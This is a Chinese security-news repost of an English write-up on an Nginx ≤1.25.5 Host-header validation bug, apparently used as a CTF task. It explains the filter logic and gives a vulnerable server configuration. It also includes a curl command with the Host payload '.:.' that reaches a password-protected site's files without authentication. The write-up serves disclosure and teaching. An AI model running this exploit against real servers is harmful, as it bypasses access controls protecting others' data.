标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2024-3401] 作者: Candy 发表于: [2024-04-26]
本文共 [41] 位读者顶过
Nginx 版本 1.25.5 及更低版本似乎存在主机标头过滤验证错误,可能被用于恶意。
[出自:jiwo.org] 原文:
# Nginx =< 1.25.5 $host variable validation bug
## Intro:
In the "Host" header sent to Nginx web server you can't just insert a dot or something like that, because a filtering rules exists there.
The ngx_http_validate_host function is responsible for filtering (https://github.com/nginx/nginx/blob/master/src/http/ngx_http_request.c#L2145).
## What it validates:
+ two dots in a row are not allowed
+ colon and everything after it are stripped off
+ if "Host" header starts with "[", then after "]" everything is deleted
+ path separators are not allowed
+ cannot send chars ≤ 0x20 and == 0x7f
+ if there is a dot at the end, it is removed
+ if after all deletions the host length is zero, error occurs
## The bug itself:
dot_pos can be greater than host_len, if the last dot is included in the strip, then the last unstripped character (first dot in this case) is not deleted.
So, if "Host" header payload is .:. , the colon and dot after it are stripped, but the first dot remains untouched and Nginx $host variable now contains only single dot character, what can't be done in the normal conditions.
## Vulnerable Nginx server configuration example:
server {
root /sites/$host;
index index.html;
server_name _;
location / {
try_files $uri $uri/ =404;
}
}
server {
server_name "";
location / {
return 418 "I'm a teapot.";
}
}
server {
root /sites/protected-host.example.com;
index flag.html;
server_name protected-host.example.com;
auth_basic "Protected File Storage";
auth_basic_user_file /.htpasswd;
location / {
try_files $uri $uri/ =404;
}
}
## Exploit (unauthorized access to password-protected host in this case):
curl -H "Host: .:." http://protected-host.example.com/protected-host.example.com/flag.html
P.S.
The bug was sent to security-alert@nginx.org, but the Nginx dev team said that ngx_http_validate_host function is a filter against fools and not a security bug at all, so it was decided to make it as a task on CTF Tinkoff contest.
机翻:
#Nginx=<1.25.5$主机变量验证错误
server {
root /sites/$host;
index index.html;
server_name _;
location / {
try_files $uri $uri/ =404;
}
}
server {
server_name "";
location / {
return 418 "I'm a teapot.";
}
}
server {
root /sites/protected-host.example.com;
index flag.html;
server_name protected-host.example.com;
auth_basic "Protected File Storage";
auth_basic_user_file /.htpasswd;
location / {
try_files $uri $uri/ =404;
}
}
##利用漏洞(在这种情况下,未经授权访问受密码保护的主机):
curl -H "Host: .:." http://protected-host.example.com/protected-host.example.com/flag.html
附笔。
|